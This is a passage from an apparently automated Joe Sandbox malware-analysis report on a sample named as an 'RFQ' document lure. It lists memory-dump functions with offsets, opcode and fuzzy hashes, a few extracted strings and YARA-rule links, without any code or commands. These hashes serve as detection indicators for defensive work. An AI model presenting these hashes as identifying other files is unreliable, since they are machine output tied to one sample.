Instruction Fuzzy Hash: 3BE01270A0120CEFCB04DFB4D95076EB7F6EB45204F1185AAD909DB244DA355E049790

Function 068F18F0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1794536907.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68f0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e09de5af0a868c0ceb73c9f5b122ae36ba64628b145d77788e211143e3bcbff
Instruction ID: 0740acb45e09391215a3af43b4a9084878e19c081200b67e3838d9548dd633de
Opcode Fuzzy Hash: 2e09de5af0a868c0ceb73c9f5b122ae36ba64628b145d77788e211143e3bcbff
Instruction Fuzzy Hash: 06E01270A0120DEFCB40DFA4D55069DB7F6EB45204F1085A9D909D7304DA355E049795

Function 02ACF920 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1781424843.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f64e84023eb2254761cd1f2da478c178c9faca5ba573fd19ce34f61d57dbc6c2
Instruction ID: 972ee78ba72d6d585528faf2db8375a9dea80ce5e614114aae1a3ae00d79a92d
Opcode Fuzzy Hash: f64e84023eb2254761cd1f2da478c178c9faca5ba573fd19ce34f61d57dbc6c2
Instruction Fuzzy Hash: 5CE0E270A01208EFCB54EFB8958429DBBB6AB04305F6081AED848A2340EB759A94DB81

Function 068FF321 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1794536907.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68f0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 044bb8619973b00a72828ef087c057d3f18c05453de362e843b7dac9b28ca393
Instruction ID: 2e2fbc0a6caa4bdeec75edfb46f199775a040227db3283e4af6aeaa87d1a453a
Opcode Fuzzy Hash: 044bb8619973b00a72828ef087c057d3f18c05453de362e843b7dac9b28ca393
Instruction Fuzzy Hash: A0E017350093849FC3129F38C804885BFB4EF2A25072544DFE9C88B223C2219C58D761

Function 068FCE28 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1794536907.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68f0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6814695b44648c328eb0677a6afdbdc37c60bd4a907229e352d2782216260921
Instruction ID: 66fbd912f331374b43d2957814845dbcb9ec232ad9931451e30caad0dd84523e
Opcode Fuzzy Hash: 6814695b44648c328eb0677a6afdbdc37c60bd4a907229e352d2782216260921
Instruction Fuzzy Hash: 1BD0122725E3D80EF7A6566568402995F708782059F0907A7E784DB543C009844983A4

Function 02AC4694 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1781424843.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dad87f8edc8cc890d9b02d52c94abfc1909a7134abc00aef2c7959b67482df5
Instruction ID: 04e16da3b3521aecb613329b634065e353e59757b7cdb7f7c57027303382f897
Opcode Fuzzy Hash: 7dad87f8edc8cc890d9b02d52c94abfc1909a7134abc00aef2c7959b67482df5
Instruction Fuzzy Hash: D6E0B6B0A042188FDB60CF14C844B99B6B0BB09340FA081DA958DE6280CB749DC4CF40

Function 02AC543B Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1781424843.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05c5a24622a108077f966e85008cf6740ec8825e502f6c197ebcfae6c583c5c9
Instruction ID: f8fd08c91abc929c3f75b4095324fbdfdf793453552be1a757825b6134174760
Opcode Fuzzy Hash: 05c5a24622a108077f966e85008cf6740ec8825e502f6c197ebcfae6c583c5c9
Instruction Fuzzy Hash: 0BE0527494422FCFCBB4CF24D948AB8BAB0AF08300F0040FA9859A3640DB351A809F00

Function 06906B24 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1794585967.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6900000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f350883b6e43e9feb397a11e4541744d82a5e6bfa3ce8504fe760bf518261632
Instruction ID: 1be47724e810ebac52802c15889f95b744155d8b1e269d2a0ca7f4e157602115
Opcode Fuzzy Hash: f350883b6e43e9feb397a11e4541744d82a5e6bfa3ce8504fe760bf518261632
Instruction Fuzzy Hash: DDD042789042188FEB90DF24D884B59B7B5FB46300F108595D80DA3399CB301D94DF44

Function 06907284 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1794585967.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6900000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91f02f504526f5a550a99592cd1e3caaf302d6e98f45545dd8c77f22d5ce8322
Instruction ID: 9fac1b3ea14084d94f028c2a7bf02bb2871d51829a4259c44c3abdde3a6a0b3e
Opcode Fuzzy Hash: 91f02f504526f5a550a99592cd1e3caaf302d6e98f45545dd8c77f22d5ce8322
Instruction Fuzzy Hash: 66C00276E5001A9A8B00DAD9E4508DCB774EB94321B004026D214A6104D63115268B50

Function 02AC5929 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1781424843.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 170cd9845e5bd0755ea18b6abd57a9b1d6da09fafff27812bc0cf1bd4067473a
Instruction ID: 0cea86d6f7c9ef7f10ab2a687772c1a9898cc981fb832141b6c275429ce30f2c
Opcode Fuzzy Hash: 170cd9845e5bd0755ea18b6abd57a9b1d6da09fafff27812bc0cf1bd4067473a
Instruction Fuzzy Hash: 34D09274A0012CCFDB61DF14EC84BC9BBB0BB49305F1041DAD889A3240CB305E80CF01

Function 068FF330 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1794536907.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68f0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94

Function 06906D42 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1794585967.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6900000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09c06b5baff5b9b14ae9b4610d2a75cae493bdbe3cf1bcb2f133f1c452b75cc2
Instruction ID: 290c4bcb3864ca6bab2793b86b5c0148414cf29cdb411e54b2a7f57fae049b2e
Opcode Fuzzy Hash: 09c06b5baff5b9b14ae9b4610d2a75cae493bdbe3cf1bcb2f133f1c452b75cc2
Instruction Fuzzy Hash: 9ED0EA78E043289FDBA4CF24D985799BBB0EF46304F1090D9A88DA2250DB741EC8CF02

Function 02AC0840 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1781424843.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5cae559750ccface052958dab9a93766f8b2eb5b95bbc86fe49962685abe66b
Instruction ID: 34b41f1cb6aea7a578f41176306a1aab0efb71f9e5ec072932fe6ea9f145f084
Opcode Fuzzy Hash: b5cae559750ccface052958dab9a93766f8b2eb5b95bbc86fe49962685abe66b
Instruction Fuzzy Hash: FAC04CB144D3804FCF439B70D9A41457FF5AE5321571644DAD0C1C9966D16D0809D712

Function 068FCE6B Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1794536907.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68f0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0bc90c388f52c68dee73a00800a70ea5531d9a92b2f281543785ac2f8969f7e
Instruction ID: 0cf3e7b6347217cced08f1983ff5e4e01d9a3d6d8dacd52700a0384c8a0637cf
Opcode Fuzzy Hash: c0bc90c388f52c68dee73a00800a70ea5531d9a92b2f281543785ac2f8969f7e
Instruction Fuzzy Hash: 54A0022841174285CFB43B74491D79E7B94AF60110BD51C5CD9E681006D63960D66651

Non-executed Functions

Function 06815098 Relevance: 4.0, Strings: 3, Instructions: 246COMMON

Download Yara Rule

Strings

xbaq, xrefs: 068151D5
Te^q, xrefs: 068157CB
TJcq, xrefs: 0681524A

Memory Dump Source

Source File: 00000000.00000002.1793926859.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6810000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: TJcq$Te^q$xbaq
API String ID: 0-3225726259
Opcode ID: fd628c31c370e95b269522acd469e192d9f5c935b00c5d773db4f0d07db37525
Instruction ID: ad3ce927841f8df70a0565488d878c84aa6f72b8a22789bf5432f882a02b121f
Opcode Fuzzy Hash: fd628c31c370e95b269522acd469e192d9f5c935b00c5d773db4f0d07db37525
Instruction Fuzzy Hash: 46C16675E016188FDB58CF6AC944ADDBBF2BF89300F14C1AAD909AB365DB305A81CF51

Function 068F5C28 Relevance: 2.8, Strings: 2, Instructions: 331COMMON

Download Yara Rule

Strings

,bq, xrefs: 068F5D1E
(bq, xrefs: 068F5FCC

Memory Dump Source

Source File: 00000000.00000002.1794536907.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68f0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: (bq$,bq
API String ID: 0-1616511919
Opcode ID: 9fa95c1cffbc16496f70187e8dc19226de9fc7de3ce6a6ff08aee647d7c19f1c
Instruction ID: 7fc23259a9be4d0e5e115dfcdec08c3f229dd5445562224be1fd6244f8e05dc5
Opcode Fuzzy Hash: 9fa95c1cffbc16496f70187e8dc19226de9fc7de3ce6a6ff08aee647d7c19f1c
Instruction Fuzzy Hash: EBD12A34A116048FDB94DF68C588AAEB7F2FF98304F2585A9E605DB361CB70EC81CB51

Function 02AC2897 Relevance: 2.7, Strings: 2, Instructions: 174COMMON

Download Yara Rule

Strings

4'^q, xrefs: 02AC296F
4'^q, xrefs: 02AC299A

Memory Dump Source

Source File: 00000000.00000002.1781424843.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 656e9dbcd802b6b6d1e820f16c3033c5a8dfc90e07de1fa2dc53fc137d5ed96b
Instruction ID: edf3a9268c21e7ae1422bd3b55c8e01da568876cc9d785c407773f8fdf5540d7
Opcode Fuzzy Hash: 656e9dbcd802b6b6d1e820f16c3033c5a8dfc90e07de1fa2dc53fc137d5ed96b
Instruction Fuzzy Hash: C8710A70A00619CFD708DF7EE98479ABBF6BBCA300F14C529D084DB268DB7A58469B50

Function 02AC28B8 Relevance: 2.7, Strings: 2, Instructions: 165COMMON

Download Yara Rule

Strings

4'^q, xrefs: 02AC296F
4'^q, xrefs: 02AC299A

Memory Dump Source

Source File: 00000000.00000002.1781424843.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: a2f986c3f7848d4d9845663f141bf276ab7405e6b7a394865d590c78c2035ca2
Instruction ID: b841eec045a77212052cbbe1d5c51e0e5d45736002689860b84b1760f813c2c5
Opcode Fuzzy Hash: a2f986c3f7848d4d9845663f141bf276ab7405e6b7a394865d590c78c2035ca2
Instruction Fuzzy Hash: 3471E970E00619CFD748EF6EE98079EBBF6BBCA300F14C529D084DB268DB7A59459B50

Function 06A54558 Relevance: 1.9, Strings: 1, Instructions: 605COMMON

Download Yara Rule

Strings

(bq, xrefs: 06A54628

Memory Dump Source

Source File: 00000000.00000002.1795041376.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a50000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: 70d714a2d1694286b92b395a0f1a15f5ff2a98aecd1379beccc22db50e3ef2e4
Instruction ID: 51a5280e752522178fc16241c013921dc7453f41923e026687e4f5128e0b2326
Opcode Fuzzy Hash: 70d714a2d1694286b92b395a0f1a15f5ff2a98aecd1379beccc22db50e3ef2e4
Instruction Fuzzy Hash: 60327970A013158FCB88DF69C49466EFBF2FF88300F258529D95ADB381DB34A955CB94

Function 068F10E0 Relevance: 1.5, Strings: 1, Instructions: 285COMMON

Download Yara Rule

Strings

Te^q, xrefs: 068F146B

Memory Dump Source

Source File: 00000000.00000002.1794536907.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68f0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 422e83d02c3325b3ed450c39c0a3e5127a2228454044e9522e6384138db7c42e
Instruction ID: ee80fee3b9e930e4fab0e4358e52320024d88da6e332a07930a3ba7e1d3ac97d
Opcode Fuzzy Hash: 422e83d02c3325b3ed450c39c0a3e5127a2228454044e9522e6384138db7c42e
Instruction Fuzzy Hash: A1C14A74D10218CFDB94CFA9D889BADBBF2BB8A304F1080A9D689E7245DB755D85CF40

Function 068F10F0 Relevance: 1.5, Strings: 1, Instructions: 248COMMON

Download Yara Rule

Strings

Te^q, xrefs: 068F146B

Memory Dump Source

Source File: 00000000.00000002.1794536907.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68f0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 91aa6988a4781e0c46db0b6c505e6bf750a70e315b8f8495da0c5f432bc3c5fe
Instruction ID: d5922049356620e30f4d6b36a9a1e7e519c8ff0ff0dd2b4deb5701f464305fff
Opcode Fuzzy Hash: 91aa6988a4781e0c46db0b6c505e6bf750a70e315b8f8495da0c5f432bc3c5fe
Instruction Fuzzy Hash: D1A14874E1021CCFEB94CFA9C849BADBBB2BB8A304F109069D649E7245DB755885CF40

Function 06A57C09 Relevance: 1.5, Strings: 1, Instructions: 205COMMON

Download Yara Rule

Strings

dbq, xrefs: 06A57E49

Memory Dump Source

Source File: 00000000.00000002.1795041376.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a50000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: dbq
API String ID: 0-1887291361
Opcode ID: efd4ed6a3cfb2e241a54bb694f67c23d06cd68cafcf169dd1c6a4d503d27ff30
Instruction ID: 9a8d89382503232ec9e6b61b83ba5615727ee1b3d06191aeb4f6c8f0ace459ec
Opcode Fuzzy Hash: efd4ed6a3cfb2e241a54bb694f67c23d06cd68cafcf169dd1c6a4d503d27ff30
Instruction Fuzzy Hash: F5914770D01218CFDB50EFA8D444BADBBF6FB4A304F1180A9D849A7288DB75AD85CF51

Function 06A57C18 Relevance: 1.5, Strings: 1, Instructions: 201COMMON

Download Yara Rule

Strings

dbq, xrefs: 06A57E49

Memory Dump Source

Source File: 00000000.00000002.1795041376.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a50000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: dbq
API String ID: 0-1887291361
Opcode ID: d648f5549db97d964d9ea17dbc5c547f07d407b42b3ec56d2c897862b51e8d1f
Instruction ID: fc79c4f2bb3c3c8de33c2dbcdc55c0aa5890f4b2fadd614db275589e2b86a7cc
Opcode Fuzzy Hash: d648f5549db97d964d9ea17dbc5c547f07d407b42b3ec56d2c897862b51e8d1f
Instruction Fuzzy Hash: 84911774E01218CFDB50EFA8D544BADBBF6FB4A304F1180A9D849A7288DB75AD85CF41

Function 02AC2E42 Relevance: 1.4, Strings: 1, Instructions: 116COMMON

Download Yara Rule

Strings

<, xrefs: 02AC300B

Memory Dump Source

Source File: 00000000.00000002.1781424843.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: <
API String ID: 0-4251816714
Opcode ID: 07e637fe0fcd3c373ebeb37b88fd1581c5727eba8c1de9dfff2d90ae161698d3
Instruction ID: db5f1927cdd5191eac795db93ed4e4822fdeaf5551044fd36a942b8086b51d58
Opcode Fuzzy Hash: 07e637fe0fcd3c373ebeb37b88fd1581c5727eba8c1de9dfff2d90ae161698d3
Instruction Fuzzy Hash: 1251FAB1D056588BEB68CF6B8D447CAFAF7AFC9300F14C1FA994CA6254DB700AC58E51

Function 06900040 Relevance: 1.3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

Strings

@, xrefs: 0690010F

Memory Dump Source

Source File: 00000000.00000002.1794585967.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6900000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 885b51c0c4330596e8cbc3739e150df4500f566b9b189e487dd916ef8139b9e9
Instruction ID: 22f603d0531f9a29a0c041798509193dd48fba3bdcc7e2e3e075d5df75b9e6bc
Opcode Fuzzy Hash: 885b51c0c4330596e8cbc3739e150df4500f566b9b189e487dd916ef8139b9e9
Instruction Fuzzy Hash: E6318C71E146298FEB59CF6BCC4469AFAFBAFC9304F04C0FA951CA6254DB740A818F41

Function 06900027 Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

@, xrefs: 0690010F

Memory Dump Source

Source File: 00000000.00000002.1794585967.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6900000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 79d8cfe204c13ba08685066e87998c59cd3fe0e578a33bee8d4bd527bfc1a8b8
Instruction ID: 29507fcaca9456d9b1a0d117e1b1606ae86319662e2a5f908ff25f20e3489ea4
Opcode Fuzzy Hash: 79d8cfe204c13ba08685066e87998c59cd3fe0e578a33bee8d4bd527bfc1a8b8
Instruction Fuzzy Hash: 54319EB1E057548FE75DCF6B8C0129AFAFBAFC9200F04C0FA955CAA255DB740A818F51

Function 069060A0 Relevance: .4, Instructions: 431COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1794585967.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6900000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 193686a59e6cbb260e6d714492ca2622c4c8c262ebec703135f2aea5d6d4585a
Instruction ID: 121fc29f82e72a1b481486d15b7e4410aae963a5af1b67fc7953b2383757394b
Opcode Fuzzy Hash: 193686a59e6cbb260e6d714492ca2622c4c8c262ebec703135f2aea5d6d4585a
Instruction Fuzzy Hash: 4F12A070E006198FDB54CFAAC98069DFBF2BF88304F24C569D419EB25AD734A946CF54

Function 06B075A0 Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1795331756.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b00000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5b70869bb738d86f9dcabf321afa9d9473ec3462834a4d274eb9a0d4ca2188a
Instruction ID: 5c5751f888f566420c35a0d95be6073c08a99c3ed2d94044abb6c65036d374ac
Opcode Fuzzy Hash: d5b70869bb738d86f9dcabf321afa9d9473ec3462834a4d274eb9a0d4ca2188a
Instruction Fuzzy Hash: 91C13DB0E01208CFEB94DF68D444B9EBBB6FB8A300F2091A9D449A7395DB35AD45CF50

Function 06B075B0 Relevance: .3, Instructions: 293COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1795331756.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b00000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2165591870e9534caa53bad1758cebb24fcd4bb2b506228fc49cef19f249a8ae
Instruction ID: fdab2d83add2f6217cf78518a4302b5ab4860920510d75190222ac40b4315c46
Opcode Fuzzy Hash: 2165591870e9534caa53bad1758cebb24fcd4bb2b506228fc49cef19f249a8ae
Instruction Fuzzy Hash: 7FC12DB0E01208CFEB94DF68D444B9EBBB6FB8A300F2091A9D449A7395DB75AD45CF50

Function 06B07A3C Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1795331756.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b00000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68889693ac937ddaa518a513b208dce79ac5878183bb3de36125064965938c8c
Instruction ID: f84a2704bebf70e30b952bb8a4e64d03eafad0f27264dc436bf357f7d7ec6d6c
Opcode Fuzzy Hash: 68889693ac937ddaa518a513b208dce79ac5878183bb3de36125064965938c8c
Instruction Fuzzy Hash: 92C130B0E01208CFEB94DF68D444B9EBBB6FB8A300F2091A9D449A7395DB35AD45CF50

Function 06A5E3EA Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1795041376.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a50000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9684fe74449d5b10be44d5285cf421910b9ab94a1aee5788ecaa0026451018dd
Instruction ID: 0040f6c7710b722253d88a3c357854a3c5b653fba6c1c8982038eb5072e930ee
Opcode Fuzzy Hash: 9684fe74449d5b10be44d5285cf421910b9ab94a1aee5788ecaa0026451018dd
Instruction Fuzzy Hash: 25B1F874E00258CFDB94EFA4C984BEDBBF1BB49304F2184A9D809AB295CB755E85CF41

Function 06B00EF7 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1795331756.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b00000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75a0851d8a3b3c8fcf4c3bbef2dc5db5a109feaee81f190fcd3d005fc161bc93
Instruction ID: 953a38fa4c2e56be04d3346b8a15a362c68cc289e47ec7718e964ce817b6c3fa
Opcode Fuzzy Hash: 75a0851d8a3b3c8fcf4c3bbef2dc5db5a109feaee81f190fcd3d005fc161bc93
Instruction Fuzzy Hash: DAB1D3B0E00219CFEB94DF69C884B9EBBF5BF49300F1081AAD858A7394DB345D859F55

Function 06B00F08 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1795331756.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b00000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6e6a729ce336ddfc958353b2cd031e9ef6df7e0c569b3992b1aa7e4e8ca192f
Instruction ID: 727a6ea7890148dc129eec3764e4c66f5adf5cf22598310ee40d079d0bb31e28
Opcode Fuzzy Hash: b6e6a729ce336ddfc958353b2cd031e9ef6df7e0c569b3992b1aa7e4e8ca192f
Instruction Fuzzy Hash: 0BB1D3B0E00219CFEB94DF69C880B9EBBF5BB49300F1080AAD919A7394DB349D859F55

Function 06906090 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1794585967.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6900000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d1a71aa3b2916e0de91de46e21582816223dcb98a317e6352b212c97df837d5
Instruction ID: ae51f3eb47055994dac08f4eb73cf68ceed59744bebbaa179380f00651003199
Opcode Fuzzy Hash: 0d1a71aa3b2916e0de91de46e21582816223dcb98a317e6352b212c97df837d5
Instruction Fuzzy Hash: 4E519571E016199BDB18CFABD94069EFBF3BFC8300F14C16AD858AB264DB3459468F50

Function 06A5C3B0 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1795041376.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a50000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3bc0984d0e8b7de0a9c85dcf6b8e44d7081dff35a85db0db53e9d95a4a46f02
Instruction ID: 2b939b451494848f71b5caaabce4f1381ad5ed278cff1bdc2c60c4eded36de0a
Opcode Fuzzy Hash: e3bc0984d0e8b7de0a9c85dcf6b8e44d7081dff35a85db0db53e9d95a4a46f02
Instruction Fuzzy Hash: CE41D170D05318CBEB58DFAAD844BDDBBF2BB89310F15C06AD80AAB258D7745985CF50

Function 068116E9 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1793926859.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6810000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dea10f612e8309523869e612a4204f8eca8070b7057be51fe1918e77f011cb06
Instruction ID: 92d6bfc8bcfe287d6904771d16c8e23bcdf2a2a9ddaf49d6f67dc2efdd8c2da5
Opcode Fuzzy Hash: dea10f612e8309523869e612a4204f8eca8070b7057be51fe1918e77f011cb06
